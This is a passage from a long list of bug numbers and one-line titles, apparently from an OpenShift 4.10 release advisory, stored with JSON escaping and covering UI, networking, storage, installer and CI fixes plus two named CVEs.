even with no_proxy var\n1990625 - Ironic agent registers with SLAAC address with privacy-stable\n1990635 - CVO does not recognize the channel change if desired version and channel changed at the same time\n1991067 - github.com can not be resolved inside pods where cluster is running on openstack. \n1991573 - Enable typescript strictNullCheck on network-policies files\n1991641 - Baremetal Cluster Operator still Available After Delete Provisioning\n1991770 - The logLevel and operatorLogLevel values do not work with Cloud Credential Operator\n1991819 - Misspelled word \"ocurred\" in oc inspect cmd\n1991942 - Alignment and spacing fixes\n1992414 - Two rootdisks show on storage step if \u0027This is a CD-ROM boot source\u0027 is checked\n1992453 - The configMap failed to save on VM environment tab\n1992466 - The button \u0027Save\u0027 and \u0027Reload\u0027 are not translated on vm environment tab\n1992475 - The button \u0027Open console in New Window\u0027 and \u0027Disconnect\u0027 are not translated on vm console tab\n1992509 - Could not customize boot source due to source PVC not found\n1992541 - all the alert rules\u0027 annotations \"summary\" and \"description\" should comply with the OpenShift alerting guidelines\n1992580 - storageProfile should stay with the same value by check/uncheck the apply button\n1992592 - list-type missing in oauth.config.openshift.io for identityProviders breaking Server Side Apply\n1992777 - [IBMCLOUD] Default \"ibm_iam_authorization_policy\" is not working as expected in all scenarios\n1993364 - cluster destruction fails to remove router in BYON with Kuryr as primary network (even after BZ 1940159 got fixed)\n1993376 - periodic-ci-openshift-release-master-ci-4.6-upgrade-from-stable-4.5-e2e-azure-upgrade is permfailing\n1994094 - Some hardcodes are detected at the code level in OpenShift console components\n1994142 - Missing required cloud config fields for IBM Cloud\n1994733 - MetalLB: IP address is not assigned to service if there is duplicate IP address in two address pools\n1995021 - resolv.conf and corefile sync slows down/stops after keepalived container restart\n1995335 - [SCALE] ovnkube CNI: remove ovs flows check\n1995493 - Add Secret to workload button and Actions button are not aligned on secret details page\n1995531 - Create RDO-based Ironic image to be promoted to OKD\n1995545 - Project drop-down amalgamates inside main screen while creating storage system for odf-operator\n1995887 - [OVN]After reboot egress node, lr-policy-list was not correct, some duplicate records or missed internal IPs\n1995924 - CMO should report `Upgradeable: false` when HA workload is incorrectly spread\n1996023 - kubernetes.io/hostname values are larger than filter when create localvolumeset from webconsole\n1996108 - Allow backwards compatibility of shared gateway mode to inject host-based routes into OVN\n1996624 - 100% of the cco-metrics/cco-metrics targets in openshift-cloud-credential-operator namespace are down\n1996630 - Fail to delete the first Authorized SSH Key input box on Advanced page\n1996647 - Provide more useful degraded message in auth operator on DNS errors\n1996736 - Large number of 501 lr-policies in INCI2 env\n1996886 - timedout waiting for flows during pod creation and ovn-controller pegged on worker nodes\n1996916 - Special Resource Operator(SRO) - Fail to deploy simple-kmod on GCP\n1996928 - Enable default operator indexes on ARM\n1997028 - prometheus-operator update removes env var support for thanos-sidecar\n1997059 - Failed to create cluster in AWS us-east-1 region due to a local zone is used\n1997226 - Ingresscontroller reconcilations failing but not shown in operator logs or status of ingresscontroller. \n1997245 - \"Subscription already exists in openshift-storage namespace\" error message is seen while installing odf-operator via UI\n1997269 - Have to refresh console to install kube-descheduler\n1997478 - Storage operator is not available after reboot cluster instances\n1997509 - flake: [sig-cli] oc builds new-build [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n1997967 - storageClass is not reserved from default wizard to customize wizard\n1998035 - openstack IPI CI: custom var-lib-etcd.mount (ramdisk) unit is racing due to incomplete After/Before order\n1998038 - [e2e][automation] add tests for UI for VM disk hot-plug\n1998087 - Fix CephHealthCheck wrapping contents and add data-tests for HealthItem and SecondaryStatus\n1998174 - Create storageclass gp3-csi after install ocp cluster on aws\n1998183 - \"r: Bad Gateway\" info is improper\n1998235 - Firefox warning: Cookie \u201ccsrf-token\u201d will be soon rejected\n1998377 - Filesystem table head is not full displayed in disk tab\n1998378 - Virtual Machine is \u0027Not available\u0027 in Home -\u003e Overview -\u003e Cluster inventory\n1998519 - Add fstype when create localvolumeset instance on web console\n1998951 - Keepalived conf ingress peer on in Dual stack cluster contains both IPv6 and IPv4 addresses\n1999076 - [UI] Page Not Found error when clicking on Storage link provided in Overview page\n1999079 - creating pods before sriovnetworknodepolicy sync up succeed will cause node unschedulable\n1999091 - Console update toast notification can appear multiple times\n1999133 - removing and recreating static pod manifest leaves pod in error state\n1999246 - .indexignore is not ingore when oc command load dc configuration\n1999250 - ArgoCD in GitOps operator can\u0027t manage namespaces\n1999255 - ovnkube-node always crashes out the first time it starts\n1999261 - ovnkube-node log spam (and security token leak?)\n1999309 - While installing odf-operator via UI, web console update pop-up navigates to OperatorHub -\u003e Operator Installation page\n1999314 - console-operator is slow to mark Degraded as False once console starts working\n1999425 - kube-apiserver with \"[SHOULD NOT HAPPEN] failed to update managedFields\" err=\"failed to convert new object (machine.openshift.io/v1beta1, Kind=MachineHealthCheck)\n1999556 - \"master\" pool should be updated before the CVO reports available at the new version occurred\n1999578 - AWS EFS CSI tests are constantly failing\n1999603 - Memory Manager allows Guaranteed QoS Pod with hugepages requested is exactly equal to the left over Hugepages\n1999619 - cloudinit is malformatted if a user sets a password during VM creation flow\n1999621 - Empty ssh_authorized_keys entry is added to VM\u0027s cloudinit if created from a customize flow\n1999649 - MetalLB: Only one type of IP address can be assigned to service on dual stack cluster from a address pool that have both IPv4 and IPv6 addresses defined\n1999668 - openshift-install destroy cluster panic\u0027s when given invalid credentials to cloud provider (Azure Stack Hub)\n1999734 - IBM Cloud CIS Instance CRN missing in infrastructure manifest/resource\n1999771 - revert \"force cert rotation every couple days for development\" in 4.10\n1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function\n1999796 - Openshift Console `Helm` tab is not showing helm releases in a namespace when there is high number of deployments in the same namespace. \n1999836 - Admin web-console inconsistent status summary of sparse ClusterOperator conditions\n1999903 - Click \"This is a CD-ROM boot source\" ticking \"Use template size PVC\" on pvc upload form\n1999983 - No way to clear upload error from template boot source\n2000081 - [IPI baremetal] The metal3 pod failed to restart when switching from Disabled to Managed provisioning without specifying provisioningInterface parameter\n2000096 - Git URL is not re-validated on edit build-config form reload\n2000216 - Successfully imported ImageStreams are not resolved in DeploymentConfig\n2000236 - Confusing usage message from dynkeepalived CLI\n2000268 - Mark cluster unupgradable if vcenter, esxi versions or HW versions are unsupported\n2000430 - bump cluster-api-provider-ovirt version in installer\n2000450 - 4.10: Enable static PV multi-az test\n2000490 - All critical alerts shipped by CMO should have links to a runbook\n2000521 - Kube-apiserver CO degraded due to failed conditional check (ConfigObservationDegraded)\n2000573 - Incorrect StorageCluster CR created and ODF cluster getting installed with 2 Zone OCP cluster\n2000628 - ibm-flashsystem-storage-storagesystem got created without any warning even when the attempt was cancelled\n2000651 - ImageStreamTag alias results in wrong tag and invalid link in Web Console\n2000754 - IPerf2 tests should be lower\n2000846 - Structure logs in the entire codebase of Local Storage Operator\n2000872 - [tracker] container is not able to list on some directories within the nfs after upgrade to 4.7.24\n2000877 - OCP ignores STOPSIGNAL in Dockerfile and sends SIGTERM\n2000938 - CVO does not respect changes to a Deployment strategy\n2000963 - \u0027Inline-volume (default fs)] volumes should store data\u0027 tests are failing on OKD with updated selinux-policy\n2001008 - [MachineSets] CloneMode defaults to linkedClone, but I don\u0027t have snapshot and should be fullClone\n2001240 - Remove response headers for downloads of binaries from OpenShift WebConsole\n2001295 - Remove openshift:kubevirt-machine-controllers decleration from machine-api\n2001317 - OCP Platform Quota Check - Inaccurate MissingQuota error\n2001337 - Details Card in ODF Dashboard mentions OCS\n2001339 - fix text content hotplug\n2001413 - [e2e][automation] add/delete nic and disk to template\n2001441 - Test: oc adm must-gather runs successfully for audit logs - fail due to startup log\n2001442 - Empty termination.log file for the kube-apiserver has too permissive mode\n2001479 - IBM Cloud DNS unable to create/update records\n2001566 - Enable alerts for prometheus operator in UWM\n2001575 - Clicking on the perspective switcher shows a white page with loader\n2001577 - Quick search placeholder is not displayed properly when the search string is removed\n2001578 - [e2e][automation] add tests for vm dashboard tab\n2001605 - PVs remain in Released state for a long time after the claim is deleted\n2001617 - BucketClass Creation is restricted on 1st page but enabled using side navigation options\n2001620 - Cluster becomes degraded if it can\u0027t talk to Manila\n2001760 - While creating \u0027Backing Store\u0027, \u0027Bucket Class\u0027, \u0027Namespace Store\u0027 user is navigated to \u0027Installed Operators\u0027 page after clicking on ODF\n2001761 - Unable to apply cluster operator storage for SNO on GCP platform. \n2001765 - Some error message in the log of diskmaker-manager caused confusion\n2001784 - show loading page before final results instead of showing a transient message No log files exist\n2001804 - Reload feature on Environment section in Build Config form does not work properly\n2001810 - cluster admin unable to view BuildConfigs in all namespaces\n2001817 - Failed to load RoleBindings list that will lead to \u2018Role name\u2019 is not able to be selected on Create RoleBinding page as well\n2001823 - OCM controller must update operator status\n2001825 - [SNO]ingress/authentication clusteroperator degraded when enable ccm from start\n2001835 - Could not select image tag version when create app from dev console\n2001855 - Add capacity is disabled for ocs-storagecluster\n2001856 - Repeating event: MissingVersion no image found for operand pod\n2001959 - Side nav list borders don\u0027t extend to edges of container\n2002007 - Layout issue on \"Something went wrong\" page\n2002010 - ovn-kube may never attempt to retry a pod creation\n2002012 - Cannot change volume mode when cloning a VM from a template\n2002027 - Two instances of Dotnet helm chart show as one in topology\n2002075 - opm render does not automatically pulling in the image(s) used in the deployments\n2002121 - [OVN] upgrades failed for IPI OSP16 OVN IPSec cluster\n2002125 - Network policy details page heading should be updated to Network Policy details\n2002133 - [e2e][automation] add support/virtualization and improve deleteResource\n2002134 - [e2e][automation] add test to verify vm details tab\n2002215 - Multipath day1 not working on s390x\n2002238 - Image stream tag is not persisted when switching from yaml to form editor\n2002262 - [vSphere] Incorrect user agent in vCenter sessions list\n2002266 - SinkBinding create form doesn\u0027t allow to use subject name, instead of label selector\n2002276 - OLM fails to upgrade operators immediately\n2002300 - Altering the Schedule Profile configurations doesn\u0027t affect the placement of the pods\n2002354 - Missing DU configuration \"Done\" status reporting during ZTP flow\n2002362 - Dynamic Plugin - ConsoleRemotePlugin for webpack doesn\u0027t use commonjs\n2002368 - samples should not go degraded when image allowedRegistries blocks imagestream creation\n2002372 - Pod creation failed due to mismatched pod IP address in CNI and OVN\n2002397 - Resources search is inconsistent\n2002434 - CRI-O leaks some children PIDs\n2002443 - Getting undefined error on create local volume set page\n2002461 - DNS operator performs spurious updates in response to API\u0027s defaulting of service\u0027s internalTrafficPolicy\n2002504 - When the openshift-cluster-storage-operator is degraded because of \"VSphereProblemDetectorController_SyncError\", the insights operator is not sending the logs from all pods. \n2002559 - User preference for topology list view does not follow when a new namespace is created\n2002567 - Upstream SR-IOV worker doc has broken links\n2002588 - Change text to be sentence case to align with PF\n2002657 - ovn-kube egress IP monitoring is using a random port over the node network\n2002713 - CNO: OVN logs should have millisecond resolution\n2002748 - [ICNI2] \u0027ErrorAddingLogicalPort\u0027 failed to handle external GW check: timeout waiting for namespace event\n2002759 - Custom profile should not allow not including at least one required HTTP2 ciphersuite\n2002763 - Two storage systems getting created with external mode RHCS\n2002808 - KCM does not use web identity credentials\n2002834 - Cluster-version operator does not remove unrecognized volume mounts\n2002896 - Incorrect result return when user filter data by name on search page\n2002950 - Why spec.containers.command is not created with \"oc create deploymentconfig \u003cdc-name\u003e --image=\u003cimage\u003e -- \u003ccommand\u003e\"\n2003096 - [e2e][automation] check bootsource URL is displaying on review step\n2003113 - OpenShift Baremetal IPI installer uses first three defined nodes under hosts in install-config for master nodes instead of filtering the hosts with the master role\n2003120 - CI: Uncaught error with ResizeObserver on operand details page\n2003145 - Duplicate operand tab titles causes \"two children with the same key\" warning\n2003164 - OLM, fatal error: concurrent map writes\n2003178 - [FLAKE][knative] The UI doesn\u0027t show updated traffic distribution after accepting the form\n2003193 - Kubelet/crio leaks netns and veth ports in the host\n2003195 - OVN CNI should ensure host veths are removed\n2003204 - Jenkins all new container images (openshift4/ose-jenkins) not supporting \u0027-e JENKINS_PASSWORD=password\u0027 ENV which was working for old container images\n2003206 - Namespace stuck terminating: Failed to delete all resource types, 1 remaining: unexpected items still remain in namespace\n2003239 - \"[sig-builds][Feature:Builds][Slow] can use private repositories as build input\" tests fail outside of CI\n2003244 - Revert libovsdb client code\n2003251 - Patternfly components with list element has list item bullet when they should not. \n2003252 - \"[sig-builds][Feature:Builds][Slow] starting a build using CLI start-build test context override environment BUILD_LOGLEVEL in buildconfig\" tests do not work as expected outside of CI\n2003269 - Rejected pods should be filtered from admission regression\n2003357 - QE- Removing the epic tags for gherkin tags related to 4.9 Release\n2003426 - [e2e][automation] add test for vm details bootorder\n2003496 - [e2e][automation] add test for vm resources requirment settings\n2003641 - All metal ipi jobs are failing in 4.10\n2003651 - ODF4.9+LSO4.8 installation via UI, StorageCluster move to error state\n2003655 - [IPI ON-PREM] Keepalived chk_default_ingress track script failed even though default router pod runs on node\n2003683 - Samples operator is panicking in CI\n2003711 - [UI] Empty file ceph-external-cluster-details-exporter.py downloaded from external cluster \"Connection Details\" page\n2003715 - Error on creating local volume set after selection of the volume mode\n2003743 - Remove workaround keeping /boot RW for kdump support\n2003775 - etcd pod on CrashLoopBackOff after master replacement procedure\n2003788 - CSR reconciler report error constantly when BYOH CSR approved by other Approver\n2003792 - Monitoring metrics query graph flyover panel is useless\n2003808 - Add Sprint 207 translations\n2003845 - Project admin cannot access image vulnerabilities view\n2003859 - sdn emits events with garbage messages\n2003896 - (release-4.10) ApiRequestCounts conditional gatherer\n2004009 - 4.10: Fix multi-az zone scheduling e2e for 5 control plane replicas\n2004051 - CMO can report as being Degraded while node-exporter is deployed on all nodes\n2004059 - [e2e][automation] fix current tests for downstream\n2004060 - Trying to use basic spring boot sample causes crash on Firefox\n2004101 - [UI] When creating storageSystem deployment type dropdown under advanced setting doesn\u0027t close after selection\n2004127 - [flake] openshift-controller-manager event reason/SuccessfulDelete occurs too frequently\n2004203 - build config\u0027s created prior to 4.8 with image change triggers can result in trigger storm in OCM/openshift-apiserver\n2004313 - [RHOCP 4.9.0-rc.0] Failing to deploy Azure cluster from the macOS installer - ignition_bootstrap.ign: no such file or directory\n2004449 - Boot option recovery menu prevents image boot\n2004451 - The backup filename displayed in the RecentBackup message is incorrect\n2004459 - QE - Modified the AddFlow gherkin scripts and automation scripts\n2004508 - TuneD issues with the recent ConfigParser changes. \n2004510 - openshift-gitops operator hooks gets unauthorized (401) errors during jobs executions\n2004542 - [osp][octavia lb] cannot create LoadBalancer type svcs\n2004578 - Monitoring and node labels missing for an external storage platform\n2004585 - prometheus-k8s-0 cpu usage keeps increasing for the first 3 days\n2004596 - [4.10] Bootimage bump tracker\n2004597 - Duplicate ramdisk log containers running\n2004600 - Duplicate ramdisk log containers running\n2004609 - output of \"crictl inspectp\" is not complete\n2004625 - BMC credentials could be logged if they change\n2004632 - When LE takes a large amount of time, multiple whereabouts are seen\n2004721 - ptp/worker custom threshold doesn\u0027t change ptp events threshold\n2004736 - [knative] Create button on new Broker form is inactive despite form being filled\n2004796 - [e2e][automation] add test for vm scheduling policy\n2004814 - (release-4.10) OCM controller - change type of the etc-pki-entitlement secret to opaque\n2004870 - [External Mode] Insufficient spacing along y-axis in RGW Latency Performance Card\n2004901 - [e2e][automation] improve kubevirt devconsole tests\n2004962 - Console frontend job consuming too much CPU in CI\n2005014 - state of ODF StorageSystem is misreported during installation or uninstallation\n2005052 - Adding a MachineSet selector matchLabel causes orphaned Machines\n2005179 - pods status filter is not taking effect\n2005182 - sync list of deprecated apis about to be removed\n2005282 - Storage cluster name is given as title in StorageSystem details page\n2005355 - setuptools 58 makes Kuryr CI fail\n2005407 - ClusterNotUpgradeable Alert should be set to Severity Info\n2005415 - PTP operator with sidecar api configured throws bind: address already in use\n2005507 - SNO spoke cluster failing to reach coreos.live.rootfs_url is missing url in console\n2005554 - The switch status of the button \"Show default project\" is not revealed correctly in code\n2005581 - 4.8.12 to 4.9 upgrade hung due to cluster-version-operator pod CrashLoopBackOff: error creating clients: invalid configuration: no configuration has been provided, try setting KUBERNETES_MASTER environment variable\n2005761 - QE - Implementing crw-basic feature file\n2005783 - Fix accessibility issues in the \"Internal\" and \"Internal - Attached Mode\" Installation Flow\n2005811 - vSphere Problem Detector operator - ServerFaultCode: InvalidProperty\n2005854 - SSH NodePort service is created for each VM\n2005901 - KS, KCM and KA going Degraded during master nodes upgrade\n2005902 - Current UI flow for MCG only deployment is confusing and doesn\u0027t reciprocate any message to the end-user\n2005926 - PTP operator NodeOutOfPTPSync rule is using max offset from the master instead of openshift_ptp_clock_state metrics\n2005971 - Change telemeter to report the Application Services product usage metrics\n2005997 - SELinux domain container_logreader_t does not have a policy to follow sym links for log files\n2006025 - Description to use an existing StorageClass while creating StorageSystem needs to be re-phrased\n2006060 - ocs-storagecluster-storagesystem details are missing on UI for MCG Only and MCG only in LSO mode deployment types\n2006101 - Power off fails for drivers that don\u0027t support Soft power off\n2006243 - Metal IPI upgrade jobs are running out of disk space\n2006291 - bootstrapProvisioningIP set incorrectly when provisioningNetworkCIDR doesn\u0027t use the 0th address\n2006308 - Backing Store YAML tab on click displays a blank screen on UI\n2006325 - Multicast is broken across nodes\n2006329 - Console only allows Web Terminal Operator to be installed in OpenShift Operators\n2006364 - IBM Cloud: Set resourceGroupId for resourceGroups, not simply resource\n2006561 - [sig-instrumentation] Prometheus when installed on the cluster shouldn\u0027t have failing rules evaluation [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n2006690 - OS boot failure \"x64 Exception Type 06 - Invalid Opcode Exception\"\n2006714 - add retry for etcd errors in kube-apiserver\n2006767 - KubePodCrashLooping may not fire\n2006803 - Set CoreDNS cache entries for forwarded zones\n2006861 - Add Sprint 207 part 2 translations\n2006945 - race condition can cause crashlooping bootstrap kube-apiserver in cluster-bootstrap\n2006947 - e2e-aws-proxy for 4.10 is permafailing with samples operator errors\n2006975 - clusteroperator/etcd status condition should not change reasons frequently due to EtcdEndpointsDegraded\n2007085 - Intermittent failure mounting /run/media/iso when booting live ISO from USB stick\n2007136 - Creation of BackingStore, BucketClass, NamespaceStore fails\n2007271 - CI Integration for Knative test cases\n2007289 - kubevirt tests are failing in CI\n2007322 - Devfile/Dockerfile import does not work for unsupported git host\n2007328 - Updated patternfly to v4.125.3 and pf.quickstarts to v1.2.3. \n2007379 - Events are not generated for master offset for ordinary clock\n2007443 - [ICNI 2.0] Loadbalancer pods do not establish BFD sessions with all workers that host pods for the routed namespace\n2007455 - cluster-etcd-operator: render command should fail if machineCidr contains reserved address\n2007495 - Large label value for the metric kubelet_started_pods_errors_total with label message when there is a error\n2007522 - No new local-storage-operator-metadata-container is build for 4.10\n2007551 - No new ose-aws-efs-csi-driver-operator-bundle-container is build for 4.10\n2007580 - Azure cilium installs are failing e2e tests\n2007581 - Too many haproxy processes in default-router pod causing high load average after upgrade from v4.8.3 to v4.8.10\n2007677 - Regression: core container io performance metrics are missing for pod, qos, and system slices on nodes\n2007692 - 4.9 \"old-rhcos\" jobs are permafailing with storage test failures\n2007710 - ci/prow/e2e-agnostic-cmd job is failing on prow\n2007757 - must-gather extracts imagestreams in the \"openshift\" namespace, but not Templates\n2007802 - AWS machine actuator get stuck if machine is completely missing\n2008096 - TestAWSFinalizerDeleteS3Bucket sometimes fails to teardown operator\n2008119 - The serviceAccountIssuer field on Authentication CR is reseted to \u201c\u201d when installation process\n2008151 - Topology breaks on clicking in empty state\n2008185 - Console operator go.mod should use go 1.16.version\n2008201 - openstack-az job is failing on haproxy idle test\n2008207 - vsphere CSI driver doesn\u0027t set resource limits\n2008223 - gather_audit_logs: fix oc command line to get the current audit profile\n2008235 - The Save button in the Edit DC form remains disabled\n2008256 - Update Internationalization README with scope info\n2008321 - Add correct documentation link for MON_DISK_LOW\n2008462 - Disable PodSecurity feature gate for 4.10\n2008490 - Backing store details page does not contain all the kebab actions. \n2008521 - gcp-hostname service should correct invalid search entries in resolv.conf\n2008532 - CreateContainerConfigError:: failed to prepare subPath for volumeMount\n2008539 - Registry doesn\u0027t fall back to secondary ImageContentSourcePolicy Mirror\n2008540 - HighlyAvailableWorkloadIncorrectlySpread always fires on upgrade on cluster with two workers\n2008599 - Azure Stack UPI does not have Internal Load Balancer\n2008612 - Plugin asset proxy does not pass through browser cache headers\n2008712 - VPA webhook timeout prevents all pods from starting\n2008733 - kube-scheduler: exposed /debug/pprof port\n2008911 - Prometheus repeatedly scaling prometheus-operator replica set\n2008926 - [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources [Serial] [Suite:openshift/conformance/serial]\n2008987 - OpenShift SDN Hosted Egress IP\u0027s are not being scheduled to nodes after upgrade to 4.8.12\n2009055 - Instances of OCS to be replaced with ODF on UI\n2009078 - NetworkPodsCrashLooping alerts in upgrade CI jobs\n2009083 - opm blocks pruning of existing bundles during add\n2009111 - [IPI-on-GCP] \u0027Install a cluster with nested virtualization enabled\u0027 failed due to unable to launch compute instances\n2009131 - [e2e][automation] add more test about vmi\n2009148 - [e2e][automation] test vm nic presets and options\n2009233 - ACM policy object generated by PolicyGen conflicting with OLM Operator\n2009253 - [BM] [IPI] [DualStack] apiVIP and ingressVIP should be of the same primary IP family\n2009298 - Service created for VM SSH access is not owned by the VM and thus is not deleted if the VM is deleted\n2009384 - UI changes to support BindableKinds CRD changes\n2009404 - ovnkube-node pod enters CrashLoopBackOff after OVN_IMAGE is swapped\n2009424 - Deployment upgrade is failing availability check\n2009454 - Change web terminal subscription permissions from get to list\n2009465 - container-selinux should come from rhel8-appstream\n2009514 - Bump OVS to 2.16-15\n2009555 - Supermicro X11 system not booting from vMedia with AI\n2009623 - Console: Observe \u003e Metrics page: Table pagination menu shows bullet points\n2009664 - Git Import: Edit of knative service doesn\u0027t work as expected for git import flow\n2009699 - Failure to validate flavor RAM\n2009754 - Footer is not sticky anymore in import forms\n2009785 - CRI-O\u0027s version file should be pinned by MCO\n2009791 - Installer: ibmcloud ignores install-config values\n2009823 - [sig-arch] events should not repeat pathologically - reason/VSphereOlderVersionDetected Marking cluster un-upgradeable because one or more VMs are on hardware version vmx-13\n2009840 - cannot build extensions on aarch64 because of unavailability of rhel-8-advanced-virt repo\n2009859 - Large number of sessions created by vmware-vsphere-csi-driver-operator during e2e tests\n2009873 - Stale Logical Router Policies and Annotations for a given node\n2009879 - There should be test-suite coverage to ensure admin-acks work as expected\n2009888 - SRO package name collision between official and community version\n2010073 - uninstalling and then reinstalling sriov-network-operator is not working\n2010174 - 2 PVs get created unexpectedly with different paths that actually refer to the same device on the node. \n2010181 - Environment variables not getting reset on reload on deployment edit form\n2010310 - [sig-instrumentation][Late] OpenShift alerting rules should have description and summary annotations [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n2010341 - OpenShift Alerting Rules Style-Guide Compliance\n2010342 - Local console builds can have out of memory errors\n2010345 - OpenShift Alerting Rules Style-Guide Compliance\n2010348 - Reverts PIE build mode for K8S components\n2010352 - OpenShift Alerting Rules Style-Guide Compliance\n2010354 - OpenShift Alerting Rules Style-Guide Compliance\n2010359 - OpenShift Alerting Rules Style-Guide Compliance\n2010368 - OpenShift Alerting Rules Style-Guide Compliance\n2010376 - OpenShift Alerting Rules Style-Guide Compliance\n2010662 - Cluster is unhealthy after image-registry-operator tests\n2010663 - OpenShift Alerting Rules Style-Guide Compliance (ovn-kubernetes subcomponent)\n2010665 - Bootkube tries to use oc after cluster bootstrap is done and there is no API\n2010698 - [BM] [IPI] [Dual Stack] Installer must ensure ipv6 short forms too if clusterprovisioning IP is specified as ipv6 address\n2010719 - etcdHighNumberOfFailedGRPCRequests runbook is missing\n2010864 - Failure building EFS operator\n2010910 - ptp worker events unable to identify interface for multiple interfaces\n2010911 - RenderOperatingSystem() returns wrong OS version on OCP 4.7.24\n2010921 - Azure Stack Hub does not handle additionalTrustBundle\n2010931 - SRO CSV uses non default category \"Drivers and plugins\"\n2010946 - concurrent CRD from ovirt-csi-driver-operator gets reconciled by CVO after deployment, changing CR as well. \n2011038 - optional operator conditions are confusing\n2011063 - CVE-2021-39226 grafana: Snapshot authentication bypass\n2011171 - diskmaker-manager constantly redeployed by LSO when creating LV\u0027s\n2011293 - Build pod are not pulling images if we are not explicitly giving the registry name with the image\n2011368 - Tooltip in pipeline visualization shows misleading data\n2011386 - [sig-arch] Check if alerts are firing during or after upgrade success --- alert KubePodNotReady fired for 60 seconds with labels\n2011411 - Managed Service\u0027s Cluster overview page contains link to missing Storage dashboards\n2011443 - Cypress tests assuming Admin Perspective could fail on shared/reference cluster\n2011513 - Kubelet rejects pods that use resources that should be freed by completed pods\n2011668 - Machine stuck in deleting phase in VMware \"reconciler failed to Delete machine\"\n2011693 - (release-4.10) \"insightsclient_request_recvreport_total\" metric is always incremented\n2011698 - After upgrading cluster to 4.8 the kube-state-metrics service doesn\u0027t export namespace labels anymore\n2011733 - Repository README points to broken documentarion link\n2011753 - Ironic resumes clean before raid configuration job is actually completed\n2011809 - The nodes page in the openshift console doesn\u0027t work. You just get a blank page\n2011822 - Obfuscation doesn\u0027t work at clusters with OVN\n2011882 - SRO helm charts not synced with templates\n2011893 - Validation: BMC driver ipmi is not supported for secure UEFI boot\n2011896 - [4.10] ClusterVersion Upgradeable=False MultipleReasons should include all messages\n2011903 - vsphere-problem-detector: session leak\n2011927 - OLM should allow users to specify a proxy for GRPC connections\n2011956 - [tracker] Kubelet rejects pods that use resources that should be freed by completed pods\n2011960 - [tracker] Storage operator is not available after reboot cluster instances\n2011971 - ICNI2 pods are stuck in ContainerCreating state\n2011972 - Ingress operator not creating wildcard route for hypershift clusters\n2011977 - SRO bundle references non-existent image\n2012069 - Refactoring Status controller\n2012177 - [OCP 4.9 + OCS 4.8.3] Overview tab is missing under Storage after successful deployment on UI\n2012228 - ibmcloud: credentialsrequests invalid for machine-api-operator: resource-group\n2012233 - [IBMCLOUD] IPI: \"Exceeded limit of remote rules per security group (the limit is 5 remote rules per security group)\"\n2012235 - [IBMCLOUD] IPI: IBM cloud provider requires ResourceGroupName in cloudproviderconfig\n2012317 - Dynamic Plugins: ListPageCreateDropdown items cut off\n2012407 - [e2e][automation] improve vm tab console tests\n2012426 - ThanosSidecarBucketOperationsFailed/ThanosSidecarUnhealthy alerts don\u0027t have namespace label\n2012562 - migration condition is not detected in list view\n2012770 - when using expression metric openshift_apps_deploymentconfigs_last_failed_rollout_time namespace label is re-written\n2012780 - The port 50936 used by haproxy is occupied by kube-apiserver\n2012838 - Setting the default maximum container root partition size for Overlay with CRI-O stop working\n2012902 - Neutron Ports assigned to Completed Pods are not reused Edit\n2012915 - kube_persistentvolumeclaim_labels and kube_persistentvolume_labels are missing in OCP 4.8 monitoring stack\n2012971 - Disable operands deletes\n2013034 - Cannot install to openshift-nmstate namespace\n2013127 - OperatorHub links could not be opened in a new tabs (sharing and open a deep link works fine)\n2013199 - post reboot of node SRIOV policy taking huge time\n2013203 - UI breaks when trying to create block pool before storage cluster/system creation\n2013222 - Full breakage for nightly payload promotion\n2013273 - Nil pointer exception when phc2sys options are missing\n2013321 - TuneD: high CPU utilization of the TuneD daemon. \n2013416 - Multiple assets emit different content to the same filename\n2013431 - Application selector dropdown has incorrect font-size and positioning\n2013528 - mapi_current_pending_csr is always set to 1 on OpenShift Container Platform 4.8\n2013545 - Service binding created outside topology is not visible\n2013599 - Scorecard support storage is not included in ocp4.9\n2013632 - Correction/Changes in Quick Start Guides for ODF 4.9 (Install ODF guide)\n2013646 - fsync controller will show false positive if gaps in metrics are observed. \n2013710 - ZTP Operator subscriptions for 4.9 release branch should point to 4.9 by default\n2013751 - Service details page is showing wrong in-cluster hostname\n2013787 - There are two tittle \u0027Network Attachment Definition Details\u0027 on NAD details page\n2013871 - Resource table headings are not aligned with their column data\n2013895 - Cannot enable accelerated network via MachineSets on Azure\n2013920 - \"--collector.filesystem.ignored-mount-points is DEPRECATED and will be removed in 2.0.0, use --collector.filesystem.mount-points-exclude\"\n2013930 - Create Buttons enabled for Bucket Class, Backingstore and Namespace Store in the absence of Storagesystem(or MCG)\n2013969 - oVIrt CSI driver fails on creating PVCs on hosted engine storage domain\n2013990 - Observe dashboard crashs on reload when perspective has changed (in another tab)\n2013996 - Project detail page: Action \"Delete Project\" does nothing for the default project\n2014071 - Payload imagestream new tags not properly updated during cluster upgrade\n2014153 - SRIOV exclusive pooling\n2014202 - [OCP-4.8.10] OVN-Kubernetes: service IP is not responding when egressIP set to the namespace\n2014238 - AWS console test is failing on importing duplicate YAML definitions\n2014245 - Several aria-labels, external links, and labels aren\u0027t internationalized\n2014248 - Several files aren\u0027t internationalized\n2014352 - Could not filter out machine by using node name on machines page\n2014464 - Unexpected spacing/padding below navigation groups in developer perspective\n2014471 - Helm Release notes tab is not automatically open after installing a chart for other languages\n2014486 - Integration Tests: OLM single namespace operator tests failing\n2014488 - Custom operator cannot change orders of condition tables\n2014497 - Regex slows down different forms and creates too much recursion errors in the log\n2014538 - Kuryr controller crash looping on self._get_vip_port(loadbalancer).id \u0027NoneType\u0027 object has no attribute \u0027id\u0027\n2014614 - Metrics scraping requests should be assigned to exempt priority level\n2014710 - TestIngressStatus test is broken on Azure\n2014954 - The prometheus-k8s-{0,1} pods are CrashLoopBackoff repeatedly\n2014995 - oc adm must-gather cannot gather audit logs with \u0027None\u0027 audit profile\n2015115 - [RFE] PCI passthrough\n2015133 - [IBMCLOUD] ServiceID API key credentials seems to be insufficient for ccoctl \u0027--resource-group-name\u0027 parameter\n2015154 - Support ports defined networks and primarySubnet\n2015274 - Yarn dev fails after updates to dynamic plugin JSON schema logic\n2015337 - 4.9.0 GA MetalLB operator image references need to be adjusted to match production\n2015386 - Possibility to add labels to the built-in OCP alerts\n2015395 - Table head on Affinity Rules modal is not fully expanded\n2015416 - CI implementation for Topology plugin\n2015418 - Project Filesystem query returns No datapoints found\n2015420 - No vm resource in project view\u0027s inventory\n2015422 - No conflict checking on snapshot name\n2015472 - Form and YAML view switch button should have distinguishable status\n2015481 - [4.10] sriov-network-operator daemon pods are failing to 